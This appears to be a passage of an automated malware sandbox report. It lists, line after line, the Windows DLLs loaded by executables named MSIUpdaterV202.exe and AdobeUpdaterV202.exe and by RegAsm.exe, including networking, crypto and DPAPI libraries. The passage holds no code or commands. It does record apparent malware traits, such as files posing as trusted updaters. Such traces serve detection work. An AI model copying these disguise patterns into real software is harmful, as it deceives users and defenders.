Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: acgenral.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmmbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmmbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: acgenral.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
